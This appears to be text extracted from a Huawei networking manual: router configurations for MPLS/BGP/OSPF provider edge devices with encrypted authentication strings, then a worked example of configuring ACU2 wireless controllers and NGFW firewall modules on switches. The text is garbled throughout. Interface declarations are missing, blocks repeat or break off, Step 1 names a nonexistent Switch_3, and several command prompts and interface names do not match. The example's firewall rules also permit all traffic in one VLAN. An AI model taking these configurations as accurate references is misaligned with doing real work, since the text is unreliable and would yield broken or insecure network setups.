route-policy p_iBGP_RR_ex permit node 0
apply community 100:100 5720:5720 12:12
#
arp expire-time 62640
XGigabitEthernet1/0/4.200
#
tunnel-policy TSel
#
bfd UPE1toSPE1_m_b bind mpls-te interface Tunnel611 te-lsp backup
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE1toSPE1_m bind mpls-te interface Tunnel611 te-lsp
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE1toSPE2_b bind mpls-te interface Tunnel612 te-lsp backup
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return


sysname Site1_UPE2
#
router id 172.16.2.50
#
#
stp disable
#
ipv4-family
tnl-policy TSel
#
bfd
#
mpls lsr-id 172.16.2.50
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls te cspf
#
mpls ldp
graceful-restart
#
#
undo portswitch
description Site1_UPE2 to Site1_UPE1
ip address 172.17.4.15 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
undo portswitch
ip address 172.17.4.13 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
#


ip address 172.18.200.67 255.255.255.192
#
eth-trunk 17
#
eth-trunk 17
#
eth-trunk 17
#
eth-trunk 17
#
eth-trunk 7
#
eth-trunk 7
#
eth-trunk 7
#
eth-trunk 7
#
interface LoopBack1
ip address 172.16.2.50 255.255.255.255
#
interface Tunnel621
mpls te commit
#
interface Tunnel622
mpls te commit
#
detect-multiplier 8
min-tx-interval 3

min-rx-interval 3
commit
#
bgp 65000
graceful-restart
peer 172.16.0.3 as-number 65000
peer 172.16.0.5 as-number 65000
peer 172.16.2.51 as-number 65000
#
ipv4-family unicast
#
ipv4-family vpnv4
policy vpn-target
peer devCore enable
peer devHost enable
#
auto-frr
#
#
ospf 1
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#GUPhWw-[LH2O6#NMxtJAl!Io8W~iF'![mQF[\9GI%^
%#
network 172.16.2.50 0.0.0.0
network 172.16.2.92 0.0.0.0
network 172.17.4.13 0.0.0.0
network 172.17.4.15 0.0.0.0
mpls-te enable
#
#

apply community 200:200 5720:5720 12:12

#
apply community 200:200 5720:5720 12:12
#
XGigabitEthernet1/0/4.200
#
tunnel-policy TSel
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return
sysname Site2_UPE3
#
router id 172.16.2.75
#
#
stp disable
#
set service-mode enhanced
#
ipv4-family
tnl-policy TSel


#
bfd
#
mpls lsr-id 172.16.2.75
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls te cspf
#
mpls ldp
graceful-restart
#
undo portswitch
ip address 172.16.8.179 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
#
ip address 172.18.150.2 255.255.255.192
#
undo portswitch
ip address 172.16.8.180 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
ip address 172.16.2.75 255.255.255.255
#
interface Tunnel111

mpls te commit
#
interface Tunnel112
mpls te commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
peer 172.16.0.3 as-number 65000
peer 172.16.0.4 as-number 65000
peer 172.16.2.76 as-number 65000
#
ipv4-family unicast
#
ipv4-family vpnv4
policy vpn-target
peer devCore enable
peer devHost enable
#


auto-frr
#
ospf 1
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#zJm-P{(FiMrB0bLa^ST'z[!(UezNNTx\CQ6@N\,K%^
%#
network 172.16.2.75 0.0.0.0
network 172.16.8.179 0.0.0.0
network 172.16.8.180 0.0.0.0
mpls-te enable
#
#
apply community 200:200 5720:5720 23:23
#
apply community 200:200 5720:5720 23:23
#
arp static 172.18.150.4 0000-0001-0003 vid 150 interface XGigabitEthernet0/0/2.150
#
tunnel-policy TSel
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst

commit
#
return
sysname Site2_UPE4
#
router id 172.16.2.76
#
#
stp disable
#
#
ipv4-family
tnl-policy TSel
#
bfd
#
mpls lsr-id 172.16.2.76
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls te cspf
#
mpls ldp
graceful-restart
#
undo portswitch
ip address 172.16.8.182 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
#
ip address 172.18.150.3 255.255.255.192


#
undo portswitch
ip address 172.16.8.181 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
ip address 172.16.2.76 255.255.255.255
#
interface Tunnel121
mpls te commit
#
interface Tunnel122
mpls te commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
peer 172.16.0.3 as-number 65000
peer 172.16.0.4 as-number 65000
peer 172.16.2.75 as-number 65000
#
ipv4-family unicast


#
ipv4-family vpnv4
policy vpn-target
peer devCore enable
peer devHost enable
#
auto-frr
#
ospf 1
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#"sZy-UeQ88(kmb#.o"Y8*@/_9D[_<-3ET`+!1no4%^
%#
network 172.16.2.76 0.0.0.0
network 172.16.8.181 0.0.0.0
network 172.16.8.182 0.0.0.0
mpls-te enable
#
#
apply community 300:300 5720:5720 23:23
#
apply community 300:300 5720:5720 23:23
#
#
tunnel-policy TSel
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#


detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return
sysname Site3_UPE5
#
router id 172.16.2.87
#
#
stp disable
#
#
ipv4-family
tnl-policy TSel
#
bfd
#
mpls lsr-id 172.16.2.87
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls te cspf
#
mpls ldp
graceful-restart
#
#


ip address 172.18.100.2 255.255.255.192
#
undo portswitch
ip address 172.17.10.0 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
undo portswitch
ip address 172.16.8.212 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
ip address 172.16.2.87 255.255.255.255
#
interface Tunnel721
mpls te commit
#
interface Tunnel722
mpls te commit
#
XGigabitEthernet0/0/2.100 source-ip 172.18.100.2 auto

min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
peer 172.16.0.4 as-number 65000
peer 172.16.0.5 as-number 65000
peer 172.16.2.86 as-number 65000
#
ipv4-family unicast
#
ipv4-family vpnv4
policy vpn-target
peer devCore enable
peer devHost enable
#
auto-frr
#
ospf 1
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %#%#^tB:@vm8r%4Z0),RRem7dU.A3.}(a&*/IhJ70>y9%#
%#
network 172.16.2.87 0.0.0.0
network 172.16.8.212 0.0.0.0
network 172.17.10.0 0.0.0.0
mpls-te enable
#
#
apply community 300:300 5720:5720 13:13

#
apply community 300:300 5720:5720 13:13
#
#
tunnel-policy TSel
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return
sysname Site3_UPE6
#
router id 172.16.2.86
#
#
stp disable
#
#
ipv4-family
tnl-policy TSel

#
bfd
#
mpls lsr-id 172.16.2.86
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls te cspf
#
mpls ldp
graceful-restart
#
#
ip address 172.18.100.3 255.255.255.192
#
undo portswitch
ip address 172.17.10.1 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
undo portswitch
ip address 172.17.10.3 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
ip address 172.16.2.86 255.255.255.255
#
interface Tunnel711


mpls te commit
#
interface Tunnel712
mpls te commit
#
XGigabitEthernet0/0/2.100 source-ip 172.18.100.3 auto
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
peer 172.16.0.4 as-number 65000
peer 172.16.0.5 as-number 65000
peer 172.16.2.87 as-number 65000
#
ipv4-family unicast
#
ipv4-family vpnv4
policy vpn-target
peer devCore enable
peer devHost enable
#
auto-frr
#

ospf 1
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %#%#<3.TS63Ml*_Gn]2$}@O/G8llX)VNvDY\kT;4E9-A%#
%#
network 172.16.2.86 0.0.0.0
network 172.17.10.1 0.0.0.0
network 172.17.10.3 0.0.0.0
mpls-te enable
#
#
apply community 100:100 5720:5720 13:13
#
apply community 100:100 5720:5720 13:13
#
#
tunnel-policy TSel
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return

2.6 Example for Configuring ACU2 and NGFW on

Switches
Background
When a switch on the live network has both ACU2 and NGFW configured, redirection needs
to be configured to ensure correct forwarding for the upstream and downstream traffic of
STAs. In addition, the wireless traffic entering and leaving the switch must be processed
according to the policies configured on NGFW.
Configuration Notes
On the NGFW side, two fixed internal Ethernet interfaces are GE1/0/0 and GE1/0/1. On the
switch side, the internal Ethernet interface numbers depend on the slot ID of the NGFW
module. For example, when the NGFW module is installed in slot 1, the interface numbers are
XGE1/0/0 and XGE1/0/1.
On the ACU2 side, two fixed internal Ethernet interfaces are XGE0/0/1 and XGE0/0/2. On
the switch side, the internal Ethernet interface numbers depend on the slot ID of the ACU2.
For example, when the ACU2 is installed in slot 2, the interface numbers are XGE2/0/0 and
XGE2/0/1.
Table 2-24 lists the products and versions to which this configuration example is applicable.
Table 2-24 Applicable products and versions

Product Software Version
Model
S12700 V200R007 and V200R008
ACU2 V200R005C10 and V200R005C20
NGFW module V100R001C10 and later versions
Two switches are located on the network shown in Figure 2-25. Switch_1 has NGFW and
ACU2 configured. Traffic policies are configured on NGFW.
The customer wants to use ACU2 to manage the wireless network, providing stable wireless
service to STAs.

Figure 2-25 Configuring ACU2 and NGFW on switches
Network
XGE3/0/1
Switch_1
Eth_trunk1
ACU2_1 Eth_trunk0
Eth_trunk1
XGE1/0/0
Switch_1 Eth_trunk0
GE1/0/0
Switch_2
XGE1/0/1
GE0/0/1
GE1/0/1
NGFW_1
AP
Data Plan
Table 2-25, Table 2-26, and Table 2-27 provide the data plan.
Table 2-25 Eth-Trunk
Device Interface Number Member Interfaces
Switch_2 Eth-trunk0 XGE0/0/1

XGE0/0/2
Switch_1 Eth-trunk0 XGE3/0/2

XGE3/0/3
Eth-trunk1 XGE2/0/0
XGE2/0/1
ACU2_1 Eth-trunk1 XGE0/0/1

XGE0/0/2

Table 2-26 VLAN

Device Data Remarks
Switch_2 Eth-trunk0: transparently Connected to Switch_1.

transmits the packets from
VLAN 42.
GE0/0/1: VLAN 42 Connected to AP.
Switch_1 Eth-trunk0: transparently Connected to Switch_2.

VLAN 42.
Eth-trunk1: transparently Connected to ACU2_1.

VLAN 42, VLAN 428.
XGE1/0/0: transparently Connected to NGFW_1.

VLAN 428.
XGE1/0/1: transparently Connected to NGFW_1.

VLAN 428.
XGE3/0/1: transparently Connected to an upper-layer

transmits the packets from device.
VLAN 428.
ACU2_1 Eth-trunk1: transparently Connected to Switch_1.

VLAN 42, VLAN 428.
NGFW_1 XGE1/0/0: transparently Connected to Switch_1.

VLAN 428.
XGE1/0/1: transparently Connected to Switch_1.

VLAN 428.
Table 2-27 IP Addresses

Device Data Remarks
ACU2_1 VLANIF428: Configure VLANIF 428 to

172.16.29.1/24 assign IP addresses to STAs.
VLANIF42: Configure VLANIF 42 as

172.18.255.240/24 the CAPWAP source
address.

1. Configure Eth-Trunk on each switch and add interfaces to VLANs. Configure the
interfaces connecting Switch_2 to the DHCP server and AP to implement network
connectivity.
2. Implement connections between ACU2 and Switch_1.
3. Implement connections between NGFW and Switch_1.
4. Configure wireless service on ACU2. Wireless service traffic is forwarded through
tunnels, and ACU2_1 functions as a DHCP server to assign IP addresses to APs and
STAs.
5. Configure traffic policies on each interface of Switch_1 and Switch_2 to ensure that
STAs can successfully go online. The configurations include:
– Configure a redirection policy for the inbound traffic on Eth-Trunk 1, which is the
internal interface between switch and ACU2, to redirect the upstream wireless
traffic to XGE1/0/1, which is the internal interface between switch and NGFW.
When traffic is forwarded from NGFW to XGE1/0/0, the traffic matches the
inbound redirection policy again, and is forwarded to upstream interface XGE3/0/1.
– Configure a redirection policy for the inbound traffic on XGE3/0/1 to redirect the
downstream wireless traffic to XGE1/0/0, which is the internal interface between
switch and NGFW. When traffic is forwarded from NGFW to XGE1/0/1, the traffic
matches the inbound redirection policy again, and is forwarded to Eth-Trunk 0,
which is the internal interface between switch and ACU2.
Procedure
Step 1 Configure Eth-Trunks between Switch_1 and Switch_3.
# Configure Switch_1.
[HUAWEI] sysname Switch_1
[Switch_1] vlan batch 42 428
[Switch_1] interface Eth-Trunk 0
[Switch_1-Eth-Trunk0] port link-type trunk
[Switch_1-Eth-Trunk0] port trunk allow-pass vlan 42
[Switch_1-Eth-Trunk0] quit
[Switch_1] interface XGigabitEthernet 3/0/2
[Switch_1-XGigabitEthernet3/0/2] eth-trunk 0
[Switch_1-XGigabitEthernet3/0/2] quit
# Configure the connection between Switch_1 and upper-layer device.

[Switch_1-XGigabitEthernet0/0/1] port link-type trunk
[Switch_1-XGigabitEthernet0/0/1] port trunk allow-pass vlan 428
# Configure Eth-trunk0 between Switch_2 and Switch_1.


[Switch_2-Eth-Trunk0] port trunk allow-pass vlan 42

# Configure the interfaces between Switch_2 and AP.

[Switch_2] interface GigabitEthernet 0/0/1
[Switch_2-GigabitEthernet0/0/1] port link-type trunk
[Switch_2-GigabitEthernet0/0/1] port trunk pvid vlan 42
[Switch_2-GigabitEthernet0/0/1] port trunk allow-pass vlan 42
[Switch_2-GigabitEthernet0/0/1] quit
Step 2 Configure Eth-Trunks between Switch_1 and ACU2.

[Switch_1-Eth-Trunk1] port trunk allow-pass vlan 42 428
[Switch_1] interface XGigabitEthernet 2/0/0 //Switch_1 connects to ACU2 through
XGE2/0/0 and XGE2/0/1. The first digit 2 indicates that ACU2 is installed in slot
2 on Switch_1.
# Configure ACU2_1 on Switch_1.

[HUAWEI] sysname ACU2_1
[ACU2_1] vlan batch 42 428
[ACU2_1] interface eth-trunk 1
[ACU2_1-Eth-Trunk1] port link-type trunk
[ACU2_1-Eth-Trunk1] port trunk allow-pass vlan 42 428
[ACU2_1-Eth-Trunk1] quit
[ACU2_1] interface XGigabitEthernet0/0/1
[ACU2_1-XGigabitEthernet0/0/0] eth-trunk 1
[ACU2_1-XGigabitEthernet0/0/0] quit
[ACU2_1] interface XGigabitEthernet0/0/2
[ACU2_1-XGigabitEthernet0/0/1] eth-trunk 1
[ACU2_1-XGigabitEthernet0/0/1] quit
Step 3 Configure the interfaces connecting Switch_1 to NGFW.

[Switch_1-XGigabitEthernet1/0/0] mac-address learning disable
[Switch_1-XGigabitEthernet1/0/0] stp disable
[Switch_1-XGigabitEthernet1/0/0] carrier up-hold-time 10000
[Switch_1-XGigabitEthernet1/0/0] am isolate XGigabitEthernet1/0/1
[Switch_1-XGigabitEthernet1/0/1] mac-address learning disable
[Switch_1-XGigabitEthernet1/0/1] stp disable
[Switch_1-XGigabitEthernet1/0/1] carrier up-hold-time 10000
[Switch_1-XGigabitEthernet1/0/1] am isolate XGigabitEthernet1/0/0

Configure NGFW_1 on Switch_1.

[HUAWEI] sysname NGFW_1
[NGFW_1] vlan batch 428
[NGFW_1] interface GigabitEthernet1/0/0
[NGFW_1-GigabitEthernet1/0/0] portswitch
[NGFW_1-GigabitEthernet1/0/0] port link-type trunk
[NGFW_1-GigabitEthernet1/0/0] undo port trunk permit vlan 1
[NGFW_1-GigabitEthernet1/0/0] port trunk permit vlan 428
[NGFW_1-GigabitEthernet1/0/0] quit
[NGFW_1] interface GigabitEthernet1/0/1
[NGFW_1-GigabitEthernet1/0/1] portswitch
[NGFW_1-GigabitEthernet1/0/1] port link-type trunk
[NGFW_1-GigabitEthernet1/0/1] undo port trunk permit vlan 1
[NGFW_1-GigabitEthernet1/0/1] port trunk permit vlan 428
[NGFW_1-GigabitEthernet1/0/1] quit
[NGFW_1] pair-interface 1 GigabitEthernet1/0/0 GigabitEthernet1/0/1 //Add the
two interfaces into an interface group. Traffic entering an interface is sent out
through a fixed interface, without the need of looking up the routing or MAC
address table.
# Add the interfaces on NGFW_1 to the security zone.

[NGFW_1] firewall zone trust
[NGFW_1-zone-trust] add interface GigabitEthernet1/0/1
[NGFW_1-zone-trust] quit
[NGFW_1]firewall zone untrust
[NGFW_1-zone-untrust] add interface GigabitEthernet1/0/0
[NGFW_1-zone-untrust] quit
# Configure an IPSec policy.

NOTE
To facilitate verification, all packets within VLAN 428 are allowed in this example. Modify the IPSec policy
after verification if necessary.
[NGFW_1] security-policy
[NGFW_1-policy-security] rule name policy1
[NGFW_1-policy-security-rule-policy1] source-zone trust
[NGFW_1-policy-security-rule-policy1] destination-zone untrust
[NGFW_1-policy-security-rule-policy1] action permit
[NGFW_1-policy-security-rule-policy1] quit
[NGFW_1-policy-security] rule name policy2
[NGFW_1-policy-security-rule-policy2] source-zone untrust
[NGFW_1-policy-security-rule-policy2] destination-zone trust
[NGFW_1-policy-security-rule-policy2] action permit
[NGFW_1-policy-security-rule-policy2] quit
[NGFW_1-policy-security] quit
Step 4 Configure wireless service on ACU2.

# Configure ACU2_1 to assign IP addresses to APs and STAs.
[ACU2_1] dhcp enable
[ACU2_1] interface Vlanif42
[ACU2_1-Vlanif42] ip address 172.18.255.240 255.255.255.0
[ACU2_1-Vlanif42] dhcp select interface
[ACU2_1-Vlanif42] quit
[ACU2_1] interface Vlanif428
[ACU2_1-Vlanif428] ip address 172.16.29.1 255.255.255.0
[ACU2_1-Vlanif428] dhcp select interface
[ACU2_1-Vlanif428] quit
# Configure the country code.

[ACU2_1] wlan ac-global country-code cn
Warning: Modifying the country code will clear channel configurations of the AP
radio using the country code and reset the AP. If the new country code does not
support the radio, all configurations of the radio are cleared. Continue?[Y/N]:y


[ACU2_1] wlan ac-global ac id 1 carrier id other
Warning: Modify the carrier ID or AC ID may cause all of the AP offline, continue?
[Y/N]:y
# Configure the source interface on ACU2_1.

[ACU2_1] capwap source interface vlanif42
# Configure basic WLAN services.

[ACU2_1] wlan
[ACU2_1-wlan-view] ap-auth-mode mac-auth

[ACU2_1-wlan-view] ap id 1 type-id 19 mac 9c37-f48c-0c40
[ACU2_1-wlan-ap-0] quit
[ACU2_1-wlan-view] ap-region id 0
[ACU2_1-wlan-ap-region-0] quit
[ACU2_1-wlan-view] ap id 1
[ACU2_1-wlan-ap-1] region-id 0
[ACU2_1-wlan-ap-1] quit
[ACU2_1-wlan-view] wmm-profile name wmm id 1
[ACU2_1-wlan-wmm-prof-wmm] quit
[ACU2_1-wlan-view] radio-profile name radio id 1
[ACU2_1-wlan-radio-prof-radio] wmm-profile name wmm
[ACU2_1-wlan-radio-prof-radio] quit
[ACU2_1-wlan-view] quit
[ACU2_1] interface wlan-ess 1
[ACU2_1-Wlan-Ess1] port hybrid pvid vlan 428
[ACU2_1-Wlan-Ess1] port hybrid untagged vlan 428
[ACU2_1-Wlan-Ess1] quit
[ACU2_1] wlan
[ACU2_1-wlan-view] security-profile name security id 1
[ACU2_1-wlan-sec-prof-security] quit
[ACU2_1-wlan-view] traffic-profile name traffic id 1
[ACU2_1-wlan-traffic-prof-traffic] quit
[ACU2_1-wlan-view] service-set name huawei id 1
[ACU2_1-wlan-service-set-huawei] ssid huawei
[ACU2_1-wlan-service-set-huawei] wlan-ess 1
[ACU2_1-wlan-service-set-huawei] security-profile name security
[ACU2_1-wlan-service-set-huawei] traffic-profile name traffic
[ACU2_1-wlan--huawei] service-vlan 428
[ACU2_1-wlan-service-set-huawei] forward-mode tunnel
[ACU2_1-wlan-service-set-huawei] quit
[ACU2_1-wlan-view] ap 1 radio 0
[ACU2_1-wlan-radio-0/0] radio-profile name radio
[ACU2_1-wlan-radio-0/0] service-set name huawei
[ACU2_1-wlan-radio-0/0] quit
[ACU2_1-wlan-view] commit ap 1
[ACU2_1-wlan-view] quit
Step 5 Configure traffic policies on each interface of Switch_1.

# Configure a traffic classifier.
[Switch_1] traffic classifier service_vlan operator or precedence 50
[Switch_1-classifier-service_vlan] if-match vlan-id 428 //Configure a traffic
classifier to match wireless service VLAN.
[Switch_1-classifier-service_vlan] quit
# Configure a traffic behavior.

[Switch_1] traffic behavior Redirect_to_XGE3/0/1
[Switch_1-behavior-Redirect_to_XGE3/0/1] permit
[Switch_1-behavior-Redirect_to_XGE3/0/1] redirect interface XGigabitEthernet3/0/1
[Switch_1-behavior-Redirect_to_XGE3/0/1] quit
[Switch_1] traffic behavior Redirect_to_ETH1
[Switch_1-behavior-Redirect_to_ETH1] permit
[Switch_1-behavior-Redirect_to_ETH1] redirect interface Eth-Trunk1

[Switch_1-behavior-Redirect_to_ETH1] quit
# Configure traffic policies.

[Switch_1] traffic policy Redirect_to_XGE3/0/1 match-order config
[Switch_1-trafficpolicy-Redirect_to_XGE3/0/1] classifier service_vlan behavior
Redirect_to_XGE3/0/1
[Switch_1-trafficpolicy-Redirect_to_XGE3/0/1] quit
[Switch_1]traffic policy Redirect_to_ETH1 match-order config
[Switch_1-trafficpolicy-Redirect_to_ETH1] classifier service_vlan behavior
Redirect_to_ETH1
[Switch_1-trafficpolicy-Redirect_to_ETH1] quit
[Switch_1] traffic policy Redirect_to_XGE1/0/0 match-order config
[Switch_1]traffic policy Redirect_to_XGE1/0/1 match-order config
# Apply a traffic policy to Eth-Trunk 1.

[Switch_1] interface Eth-Trunk1
[Switch_1-Eth-Trunk1] traffic-policy Redirect_to_XGE1/0/1 inbound //Redirect
wireless service traffic forwarded by ACU2 to XGE1/0/1 of Switch_1. This
interface connects to GE1/0/1 of NGFW_1.
# Apply a traffic policy to XGE1/0/0.

[Switch_1-XGigabitEthernet1/0/0] traffic-policy Redirect_to_XGE3/0/1 inbound //
Redirect the wireless traffic forwarded by NGFW to XGE3/0/1.

[Switch_1-Eth-Trunk0] traffic-policy Redirect_to_XGE1/0/0 inbound //Redirect
downstream wireless traffic to XGE1/0/0 of Switch_1. This interface connects to
GE1/0/0 of NGFW_1.

[Switch_1-XGigabitEthernet1/0/1] traffic-policy Redirect_to_ETH1 inbound //
Redirect wireless service traffic forwarded by NGFW to Eth-Trunk1 of Switch_1.
This interface connects to Eth-Trunk1 of ACU2_1.

# Check the configurations on Switch_1.
<Switch_1> display device
S7703's Device status:
Slot Sub Type Online Power Register Status Role
-------------------------------------------------------------------------------
1 - LE1D2FW00S01 Present PowerOn Registered Normal NA
2 - ACU2 Present PowerOn Registered Normal NA

3 - ES0D0X4UXA00 Present PowerOn Registered Normal NA

4 - ES0D00MCUA00 Present PowerOn Registered Normal Master
PWR1 - - Present PowerOn Registered Normal NA
FAN1 - - Present PowerOn Registered Normal NA
# Check that the Eth-Trunk 1 status between ACU2 and Switch_1 is normal.
<ACU2_1> display interface brief | include up
PHY: Physical
*down: administratively down
(l): loopback
(s): spoofing
(b): BFD down
(e): ETHOAM down
InUti/OutUti: input utility/output utility
Interface PHY Protocol InUti OutUti inErrors outErrors
Eth-Trunk1 up up 0.01% 0.01% 0 0
XGigabitEthernet0/0/1 up up 0.01% 0.01% 0 0
XGigabitEthernet0/0/2 up up 0% 0% 0 0
# After an AP is powered on, check that the AP status is normal.

<ACU2_1> display ap all
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
1 AP6010DN-AGN 9c37-f48c-0c40 0/0 normal ap-1
------------------------------------------------------------------------------
# Check that the STAs are online.

<ACU2_1> display access-user
----------------------------------------------------------------------------------
-------------
UserID Username IP address MAC
Status
----------------------------------------------------------------------------------
-------------
68 986cf56f7e20 172.16.29.254 986c-f56f-7e20
Success
----------------------------------------------------------------------------------
-------------
Total: 1, printed: 1
# Check that traffic statistics on each interface of Switch_1 are correct.

<Switch_1> display interface Eth-Trunk0
Eth-Trunk0 current state : UP
Line protocol current state : UP
Description: to Core
Switch Port, Link-type : trunk(configured),
PVID : 1, Hash arithmetic : According to SIP-XOR-DIP,Maximal BW:40G, Current
BW: 40G, The Maximum Frame Length is 9216
IP Sending Frames' Format is PKTFMT_ETHNT_2, Hardware address is d4b1-10b3-2bde
Current system time: 2016-03-12 17:16:08
Last 300 seconds input rate 5128 bits/sec, 5 packets/sec
Last 300 seconds output rate 7184 bits/sec, 6 packets/sec
Input: 996134 packets, 122502357 bytes
Unicast: 871023, Multicast: 17723
Broadcast: 107988, Jumbo: 0
Discard: 0, Pause: 0

Frames: 0
Total Error: 0
CRC: 0, Giants: 0
Jabbers: 0, Fragments: 0
Runts: 0, DropEvents: 0
Alignments: 0, Symbols: 0
Ignoreds: 0, Frames: 0
Output: 1085606 packets, 134379838 bytes

Total Error: 0
Collisions: 0, ExcessiveCollisions: 0
Late Collisions: 0, Deferreds: 0
Buffers Purged: 0
Input bandwidth utilization : 0%

Output bandwidth utilization : 0%
-----------------------------------------------------
PortName Status Weight
-----------------------------------------------------
XGigabitEthernet3/0/2 UP 1
-----------------------------------------------------
The Number of Ports in Trunk : 2
The Number of UP Ports in Trunk : 2
<Switch_1> display interface Eth-Trunk1
Eth-Trunk0 current state : UP
Line protocol current state : UP
Description: to ACU_1 Slot2
Switch Port, Link-type : trunk(configured),
PVID : 1, Hash arithmetic : According to SIP-XOR-DIP,Maximal BW:40G, Current
BW: 40G, The Maximum Frame Length is 9216
IP Sending Frames' Format is PKTFMT_ETHNT_2, Hardware address is d4b1-10b3-2bde
Current system time: 2016-03-12 17:16:09
Last 300 seconds input rate 5608 bits/sec, 4 packets/sec
Last 300 seconds output rate 6480 bits/sec, 4 packets/sec
Input: 1046610 packets, 131462045 bytes
Frames: 0
Total Error: 0
CRC: 0, Giants: 0
Jabbers: 0, Fragments: 0
Runts: 0, DropEvents: 0
Alignments: 0, Symbols: 0
Ignoreds: 0, Frames: 0
Output: 1603637 packets, 226275601 bytes

Total Error: 0
Collisions: 0, ExcessiveCollisions: 0
Late Collisions: 0, Deferreds: 0
Buffers Purged: 0
Input bandwidth utilization : 0%

Output bandwidth utilization : 0%
-----------------------------------------------------
-----------------------------------------------------

-----------------------------------------------------
The Number of Ports in Trunk : 2
The Number of UP Ports in Trunk : 2
----End
Configuration Files
l Switch_1 configuration file
#
sysname Switch_1
#
vlan batch 42 428
#
traffic classifier service_vlan operator or precedence 50
if-match vlan-id 428
#
traffic behavior Redirect_to_XGE3/0/1
permit
redirect interface XGigabitEthernet3/0/1
traffic behavior Redirect_to_ETH1
permit
redirect interface Eth-Trunk1
permit
permit
#
traffic policy Redirect_to_XGE3/0/1 match-order config
classifier service_vlan behavior Redirect_to_XGE3/0/1
traffic policy Redirect_to_ETH1 match-order config
classifier service_vlan behavior Redirect_to_ETH1
#
description to Core
#
description to ACU_1 Slot2
port trunk allow-pass vlan 42 428
traffic-policy Redirect_to_XGE1/0/1 inbound
#
mac-address learning disable
stp disable
carrier up-hold-time 10000
am isolate XGigabitEthernet1/0/1
#
mac-address learning disable
stp disable
traffic-policy Redirect_to_ETH1 inbound

carrier up-hold-time 10000

am isolate XGigabitEthernet1/0/0
#
eth-trunk 1
#
eth-trunk 1
#
#interface XGigabitEthernet3/0/2
eth-trunk 0
#
eth-trunk 0
#
return
l Switch_2 configuration file
#
sysname Switch_2
#
vlan batch 42
#
#
eth-trunk 0
#
eth-trunk 0
#
port type pvid vlan 42
port type allow vlan 42
#
return
l ACU2_1 configuration file
#
sysname ACU2_1
#
vlan batch 42 428
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif42
ip address 172.18.255.240 255.255.255.0
#
interface Vlanif428
ip address 172.16.29.1 255.255.255.0
#
#
eth-trunk 1

#
eth-trunk 1
#
interface Wlan-Ess1
#
capwap source interface vlanif42

#
wlan
ap-region id 0
ap-auth-mode mac-auth
ap id 1 type-id 19 mac 9c37-f48c-0c40 sn 21023585619WF6000564
region-id 0
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
service-set name huawei id 1
forward-mode tunnel
wlan-ess 1
ssid huawei
traffic-profile id 1
security-profile id 1
service-vlan 428
radio-profile name radio id 1
wmm-profile id 1
